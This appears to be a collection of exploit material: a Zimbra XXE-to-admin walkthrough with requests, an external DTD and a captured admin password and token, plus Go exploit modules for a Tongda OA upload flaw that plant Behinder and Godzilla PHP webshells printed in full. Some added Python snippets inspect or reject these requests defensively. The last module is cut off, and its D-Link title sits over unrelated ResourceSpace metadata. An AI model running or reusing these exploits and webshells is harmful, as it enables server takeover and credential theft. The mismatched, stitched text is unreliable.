fileUpload, err := uploadFilesdsad31290as(expResult.HostInfo, fileName, content, successfullyVerifiedLogin.Cookie, Token[1])
if err != nil {
expResult.Output = err.Error()
} else if err == nil && strings.Contains(fileUpload.RawBody, "'success':true") {
if uploadResults, err := uploadVerificationdsad321321asd(expResult.HostInfo, fileName, content); err == nil && (strings.Contains(uploadResults.RawBody, "e165421110ba03099a1c0393373c5b43") || attackType == "custom") && uploadResults.StatusCode == 200 {
expResult.Success = true
expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/" + fileName + "\n"
if attackType == "behinder" {
expResult.Output += "Password: rebeyond\n"
expResult.Output += "WebShell tool: Behinder v3.0\n"
} else if attackType == "godzilla" {
expResult.Output += "Password: pass 加密器:PHP_XOR_BASE64\n"
expResult.Output += "WebShell tool: Godzilla v4.1\n"
}
expResult.Output += "Webshell type: php"
} else {
expResult.Output = err.Error()
}
} else {
expResult.Output = `漏洞利用失败`
}
} else {
expResult.Output = `漏洞利用失败`
}
return expResult
},
))
}

Vulnerability ID: CVD-2023-2190

Zimbra arbitrary file read (CVE-2019-9670) to RCE

File read

```http
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xxxxxx.com
Cookie: ZM_TEST=true; ZA_SKIN=serenity
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 307
Accept-Encoding: gzip, deflate
Connection: close

<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
```

Reading the password

Because localconfig.xml is itself an XML file, it has to be wrapped in a CDATA section to be read as text; and because XXE cannot concatenate parameter entities inside the internal subset, an external DTD is needed here.

External DTD (out-of-band entity) content:

```xml
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
```

Then reuse the earlier request, with this XML body, to carry out the XXE attack.

```xml
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://地址/dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
```

Request:

```http
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 331
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "http://172.16.30.44:8000/demo.dtd">%dtd;%all;]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress><AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema></Request></Autodiscover>
```

The script's regex that extracts the password from the response:

```go
passwd := regexp.MustCompile("&lt;key name=\"ldap_amavis_password\"&gt;\\n    &lt;value&gt;(.*)&lt;/value&gt;").FindStringSubmatch(modifiedString)
```
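Both Autodiscover requests above only work because the server-side XML parser honours the DOCTYPE and resolves SYSTEM entities. This added Python example, not Zimbra's code, parses the same request body while refusing any DTD, so both the inline file:///etc/passwd entity and the external-DTD variant are rejected before any entity is looked at; the three bodies are the ones quoted above, embedded inline as sample input.

```python
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    pass


def parse_autodiscover(xml_text: str) -> dict:
    """Return {element_name: text} for the leaf elements of an Autodiscover request.

    Any <!DOCTYPE ...> aborts the parse: without a DTD there are no entities,
    so neither SYSTEM file reads, remote DTD fetches nor internal-entity
    expansion blow-ups are possible."""
    parser = expat.ParserCreate()
    fields = {}
    stack = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE not permitted: " + name)

    def external_entity(context, base, sysid, pubid):
        return 0  # defence in depth: never fetch an external entity

    def start(name, attrs):
        stack.append(name)

    def end(name):
        stack.pop()

    def chars(data):
        if stack and data.strip():
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return fields


def is_rejected(xml_text: str) -> bool:
    try:
        parse_autodiscover(xml_text)
    except (DtdNotAllowed, expat.ExpatError):
        return True
    return False


# --- sample bodies copied from the requests above (sample input, not live traffic) ---
NS = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"
XXE_BODY = ('<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
            '<Autodiscover xmlns="' + NS + '"><Request><EMailAddress>aaaaa</EMailAddress>'
            '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>')
OOB_BODY = ('<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "http://172.16.30.44:8000/demo.dtd">%dtd;%all;]>'
            '<Autodiscover xmlns="' + NS + '"><Request><EMailAddress>aaaaa</EMailAddress>'
            '<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema></Request></Autodiscover>')
BENIGN_BODY = ('<Autodiscover xmlns="' + NS + '"><Request><EMailAddress>aaaaa</EMailAddress>'
               '<AcceptableResponseSchema>' + NS + '</AcceptableResponseSchema></Request></Autodiscover>')
```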

Obtaining a low-privilege token with the password

Use the password obtained above to get a low-privilege cookie.

```http
POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 452
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAccount">
<account by="adminName">zimbra</account>
<password>479ADPOKv</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
```

Obtaining the high-privilege token from the low-privilege one

Use the low-privilege token obtained above to get the high-privilege cookie.

```http
POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_ADMIN_AUTH_TOKEN=0_73a3f65da91ca050f92c075b242f7934c03fd2aa_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313730313234353737333838333b747970653d363a7a696d6272613b7469643d31303a313036393033393138343b
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<account by="adminName">zimbra</account>
<password>479ADPOKv</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
```

Obtaining high privileges directly with the password

Get the high-privilege token directly with the password, with no need for the low-privilege cookie.

```http
POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<account by="adminName">zimbra</account>
<password>479ADPOKv</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
```

Via SSRF

Tongda OA action_crawler.php file upload vulnerability

Reproduction

Upload PoC

```http
POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: 47.88.168.12:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 269
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

CONFIG%5bcatcherPathFormat%5d=/api/test64AA43fAa7&CONFIG%5bcatcherMaxSize%5d=100000&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico&CONFIG%5bcatcherFieldName%5d=file&file[]=http://gobygo.net/i/7ebb93754e477ad5/qBqacYBmhXemraMY.png#.php
```

http://gobygo.net/i/7ebb93754e477ad5/qBqacYBmhXemraMY.png is the content of the file to be uploaded, test64AA43fAa7 is the file name, and .php makes it a PHP file.
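The request above only works because the crawler accepts CONFIG[...] values from the client and keeps the #.php fragment of the remote URL as the saved extension. As an added example in Python (not the Goby PoC or Tongda OA's code), this inspects a captured request body, using the one quoted above as sample input, and lists the reasons a gateway or log reviewer should block it; it fetches nothing.

```python
from urllib.parse import parse_qsl, urlsplit

EXECUTABLE_EXT = (".php", ".php3", ".php5", ".phtml", ".phar")

# Sample body copied from the request quoted above (sample input, not live traffic).
SAMPLE_BODY = (
    "CONFIG%5bcatcherPathFormat%5d=/api/test64AA43fAa7"
    "&CONFIG%5bcatcherMaxSize%5d=100000"
    "&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php"
    "&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico"
    "&CONFIG%5bcatcherFieldName%5d=file"
    "&file[]=http://gobygo.net/i/7ebb93754e477ad5/qBqacYBmhXemraMY.png#.php"
)


def inspect_crawler_body(body: str) -> list:
    """Return a list of findings for an action_crawler.php request body.

    An empty list means nothing suspicious. parse_qsl URL-decodes the keys,
    so CONFIG%5bcatcherAllowFiles%5d%5b%5d becomes CONFIG[catcherAllowFiles][]."""
    findings = []
    params = parse_qsl(body, keep_blank_values=True)

    # The catcher reads its source URLs from the field named by catcherFieldName;
    # UEditor's default is "source", and the PoC renames it to "file".
    field = next((v for k, v in params if k == "CONFIG[catcherFieldName]"), "source")

    for key, value in params:
        if key.startswith("CONFIG["):
            # Server configuration must never be settable from the request at all.
            findings.append("client overrides server config: %s=%s" % (key, value))
            if key == "CONFIG[catcherAllowFiles][]" and value.lower() in EXECUTABLE_EXT:
                findings.append("allow-list extended with executable extension " + value)
        if key in (field, field + "[]"):
            parts = urlsplit(value)
            # The path ends in .png; the .php hides in the fragment (or the query).
            for piece in (parts.fragment, parts.query):
                if piece.lower().endswith(EXECUTABLE_EXT):
                    findings.append("remote URL carries executable extension outside the path: " + value)
                    break
    return findings
```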

Access the uploaded file:

```http
GET /api/test64AA43fAa7.php HTTP/1.1
Host: 47.88.168.12:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
```

Go PoC

package exploits

import (
"bytes"
"git.gobies.org/goby/goscanner/godclient"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"math/rand"
"strings"
)

func init() {
expJson := `{
"Name": "TongdaOA action_crawler.php 文件上传漏洞",
"Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。</p><p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。</p>",
"Product": "通达oa",
"Homepage": "https://www.tongda2000.com/",
"DisclosureDate": "2022-08-10",
"Author": "2737977997@qq.com",
"FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
"GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
"Level": "3",
"Impact": "<p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。<br></p>",
"Recommendation": "<p>1、官方已修复该漏洞,请用户升级至11.x或者12.x最新版(2017未修复):<a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2、部署Web应用防火墙,对文件操作进行监控。</p><p>3、如非必要,禁止公网访问该系统。</p>",
"References": [
"https://www.tongda2000.com/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "attackType",
"type": "select",
"value": "webshell",
"show": ""
},
{
"name": "webshell",
"type": "select",
"value": "behinder,godzilla,custom",
"show": "attackType=webshell"
},
{
"name": "filename",
"type": "input",
"value": "hello12341x.php",
"show": "attackType=webshell,webshell=custom"
},
{
"name": "content",
"type": "input",
"value": "<?php echo \"hello\" ; ?>",
"show": "attackType=webshell,webshell=custom"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/api/upload_crawler.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{{{param}}}={{{cmd}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([\\w\\W]+)"
]
}
],
"Tags": [
"文件上传"
],
"VulType": [
"文件上传"
],
"CVEIDs": [],
"CNNVD": [],
"CNVD": [],
"CVSSScore": "10.0",
"Translation": {
"CN": {
"Name": "TongdaOA action_crawler.php 文件上传漏洞",
"Product": "通达oa",
"Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。</p><p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。</p>",
"Recommendation": "<p>1、官方已修复该漏洞,请用户升级至11.x或者12.x最新版(2017未修复):<a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2、部署Web应用防火墙,对文件操作进行监控。</p><p>3、如非必要,禁止公网访问该系统。</p>",
"Impact": "<p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。<br></p>",
"VulType": [
"文件上传"
],
"Tags": [
"文件上传"
]
},
"EN": {
"Name": "TongdaOA action_crawler.php File Upload Vulnerability",
"Product": "TongdaOA",
"Description": "<p>Office Anywhere (Office Anywhere Network Intelligent Office System) is a collaborative office automation system independently developed by Beijing Tongda Information Technology Co., Ltd. It includes process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office, etc.</p><p>Action for Tongda OA2017-v20200417 version_ There is a file upload vulnerability in the crawler. PHP file, which can be exploited by attackers to execute malicious code, write backdoors, and read sensitive files, potentially leading to server attacks and control.</p>",
"Recommendation": "<p>1. The vulnerability has been officially fixed, please upgrade to the latest version of 11.x or 12.x (not fixed in 2017): <a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2. Deploy a web application firewall to monitor file operations.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
"Impact": "<p>Action for Tongda OA2017-v20200417 version_ There is a file upload vulnerability in the crawler. PHP file, which can be exploited by attackers to execute malicious code, write backdoors, and read sensitive files, potentially leading to server attacks and control.<br><br></p>",
"VulType": [
"File Upload"
],
"Tags": [
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
randomStringfMsBHs9Cf := func(size int) string {
alpha := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
var buffer bytes.Buffer
for i := 0; i < size; i++ {
buffer.WriteByte(alpha[rand.Intn(len(alpha))])
}
return buffer.String()
}

verifyUploadedFilesfMsBHs9Cf := func(hostInfo *httpclient.FixUrl, filename, content string) (*httpclient.HttpResponse, error) {
authenticationRequest := httpclient.NewGetRequestConfig("/api/" + filename + ".php")
authenticationRequest.VerifyTls = false
authenticationRequest.FollowRedirect = false
return httpclient.DoHttpRequest(hostInfo, authenticationRequest)
}

uploadFlagsfMsBHs9Cf := func(hostInfo *httpclient.FixUrl, filename, content string) (int, error) {
var localConfig int
// Upload the file
err := godclient.HostFile(randomStringfMsBHs9Cf(16)+".png", content, func(fileURL string) error {
uploadRequestConfig := httpclient.NewPostRequestConfig(`/module/ueditor/php/action_crawler.php`)
uploadRequestConfig.Header.Store("Content-Type", "application/x-www-form-urlencoded")
uploadRequestConfig.VerifyTls = false
uploadRequestConfig.FollowRedirect = false
uploadRequestConfig.Data = "CONFIG%5bcatcherPathFormat%5d=/api/" + filename + "&CONFIG%5bcatcherMaxSize%5d=100000&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico&CONFIG%5bcatcherFieldName%5d=file&file[]=" + fileURL + "#.php"
resp, err := httpclient.DoHttpRequest(hostInfo, uploadRequestConfig)
localConfig = resp.StatusCode
return err
})
return localConfig, err
}

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, hostInfo *httpclient.FixUrl, stepLogs *scanconfig.SingleScanConfig) bool {
fileName := "test" + goutils.RandomHexString(10)
content := goutils.RandomHexString(10)
localConfig, _ := uploadFlagsfMsBHs9Cf(hostInfo, fileName, `<?php @error_reporting(0);echo "`+content+`";unlink(__FILE__);?>`)
resp, err := verifyUploadedFilesfMsBHs9Cf(hostInfo, fileName, content)
// a transport error leaves resp nil, so check err before reading the body
return err == nil && localConfig == 200 && strings.Contains(resp.Utf8Html, content)
},
func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
attackType := goutils.B2S(stepLogs.Params["attackType"])
if attackType == "webshell" {
fileName := "test" + goutils.RandomHexString(10)
check := goutils.RandomHexString(10)
var content string
webshell := goutils.B2S(stepLogs.Params["webshell"])
if webshell == "behinder" {
content = `<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++){$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post,"AES128",$key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p){eval($p."");}}@call_user_func(new C(),$params);echo "` + check + `";?>`
} else if webshell == "godzilla" {
content = `<?php @session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c=$K[$i+1&15];$D[$i]=$D[$i]^$c;}return $D;}$pass='pass';$payloadName='payload';$key='3c6e0b8a9c15224a';if(isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if(isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if(strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if(strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}}echo "` + check + `";?>`
} else if webshell == "custom" {
content = goutils.B2S(stepLogs.Params["content"])
fileName = goutils.B2S(stepLogs.Params["filename"])
} else {
expResult.Output = `未知的利用方式`
return expResult
}
localConfig, err := uploadFlagsfMsBHs9Cf(expResult.HostInfo, fileName, content)
if err != nil {
expResult.Output = err.Error()
return expResult
}
resp, err := verifyUploadedFilesfMsBHs9Cf(expResult.HostInfo, fileName, content)
if err != nil {
expResult.Output = err.Error()
return expResult
} else if strings.Contains(resp.Utf8Html, check) && localConfig == 200 && (webshell == "behinder" || webshell == "godzilla") {
expResult.Success = true
expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/api/" + fileName + ".php\n"
if webshell == "behinder" {
expResult.Output += "Password: rebeyond\n"
expResult.Output += "WebShell tool: Behinder v3.0\n"
} else if webshell == "godzilla" {
expResult.Output += "Password: pass 加密器:PHP_XOR_BASE64\n"
expResult.Output += "WebShell tool: Godzilla v4.1\n"
}
expResult.Output += "Webshell type: php"
} else if webshell == "custom" && localConfig == 200 {
expResult.Success = true
expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/api/" + fileName + ".php\n"
} else {
expResult.Output = `漏洞利用失败`
}
} else {
expResult.Success = false
expResult.Output = "未知的利用方式"
}
return expResult
},
))
}
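The module above works because UEditor's PHP catcher honours CONFIG[...] values sent by the client, so a request can widen the allowed extensions to .php and move the save path. The following is an added example (not code from the page, from Tongda OA or from UEditor) that inspects one such request body, as a WAF rule or log-review script would, and reports the overrides; the expected upload prefix and the extension lists are assumptions for this example, and the sample bodies are constructed.

```python
"""Inspect one request to UEditor's PHP 'catcher' action (action_crawler.php)
and flag client-supplied CONFIG[...] overrides. Added example; the policy
constants below are assumptions, not UEditor's real configuration."""
from urllib.parse import parse_qs, urlsplit

# Assumed server-side policy: where a sane catcher config would save files.
EXPECTED_UPLOAD_PREFIX = "/upload/image/"
# Extensions a PHP web server will execute; no client must be able to add them.
EXECUTABLE_EXTS = {".php", ".php3", ".php5", ".phtml", ".phar"}


def _ext_of(name: str) -> str:
    """Lower-cased extension of a filename or URL fragment, '' if none."""
    base = name.rsplit("/", 1)[-1]
    return ("." + base.rsplit(".", 1)[-1]).lower() if "." in base else ""


def inspect_catcher_request(path: str, body: str) -> dict:
    """Return {'suspicious': bool, 'findings': [...]} for a POST to action_crawler.php."""
    findings = []
    if not urlsplit(path).path.endswith("/action_crawler.php"):
        return {"suspicious": False, "findings": findings}
    # parse_qs percent-decodes, so CONFIG%5bcatcherAllowFiles%5d%5b%5d becomes
    # the literal key "CONFIG[catcherAllowFiles][]".
    params = parse_qs(body, keep_blank_values=True)
    config_keys = sorted(k for k in params if k.startswith("CONFIG["))
    if config_keys:
        # UEditor is meant to read its config from config.json on the server;
        # a request shipping its own CONFIG[...] values is trying to override that.
        findings.append("client-supplied config keys: " + ", ".join(config_keys))
    for ext in params.get("CONFIG[catcherAllowFiles][]", []):
        if ext.lower() in EXECUTABLE_EXTS:
            findings.append("executable extension allowed: " + ext)
    for fmt in params.get("CONFIG[catcherPathFormat]", []):
        if ".." in fmt.split("/") or not fmt.startswith(EXPECTED_UPLOAD_PREFIX):
            findings.append("save path outside upload dir: " + fmt)
    for src in params.get("file[]", []):
        # A URL such as http://host/x.png#.php fetches as an image, but the
        # '.php' suffix is what the catcher sees when it derives the saved name.
        if _ext_of(urlsplit(src).fragment) in EXECUTABLE_EXTS:
            findings.append("remote file URL carries executable fragment: " + src)
    return {"suspicious": bool(findings), "findings": findings}


# Constructed samples modelled on the request the module above sends (host is a placeholder).
SAMPLE_ATTACK_BODY = (
    "CONFIG%5bcatcherPathFormat%5d=/api/testabc&CONFIG%5bcatcherMaxSize%5d=100000"
    "&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico"
    "&CONFIG%5bcatcherFieldName%5d=file&file[]=http://203.0.113.5/img.png#.php"
)
SAMPLE_BENIGN_BODY = "file[]=http://203.0.113.5/img.png"

if __name__ == "__main__":
    for body in (SAMPLE_ATTACK_BODY, SAMPLE_BENIGN_BODY):
        print(inspect_catcher_request("/module/ueditor/php/action_crawler.php", body))
```

The first finding (any CONFIG[...] key at all) is the one worth alerting on: a legitimate editor never sends configuration to the server, so the check does not depend on which extension or path the request happens to use.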
package exploits

import (
"errors"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"regexp"
"strings"
)

func init() {
expJson := `{
"Name": "D-Link Go-RT-AC750 hedwig.cgi 命令注入漏洞(CVE-2023-48842)",
"Description": "<p>Montala ResourceSpace是英国Montala公司的一种开源数字资产管理工具。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">ResourceSpace 9.5 以及之前版本&nbsp;add_keyword.php 文件的 k 参数存在 sql 注入漏洞。攻击者可以获取ResourceSpace数据库的全部内容,包括用户会话cookie。</span><br></p>",
"Product": "ResourceSpace",
"Homepage": "https://www.resourcespace.com/",
"DisclosureDate": "2021-09-27",
"Author": "2075068490@qq.com",
"FofaQuery": "\"Go-RT-AC750\"",
"GobyQuery": "\"Go-RT-AC750\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">该漏洞允许攻击者获取 ResourceSpace 数据库的完整内容,包括用户会话 cookie。</span><br></p>",
"Recommendation": "<p>厂商已发布解决方案,请更新到最新版本:<a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
"References": [
"https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"Tags": [],
"VulType": [
"SQL注入"
],
"CVEIDs": [
"CVE-2021-41765"
],
"CNNVD": [
"CNNVD-202111-1222"
],
"CNVD": [
"CNVD-2021-103102"
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "D-Link Go-RT-AC750 hedwig.cgi 命令注入漏洞(CVE-2023-48842)",
"Product": "ResourceSpace",
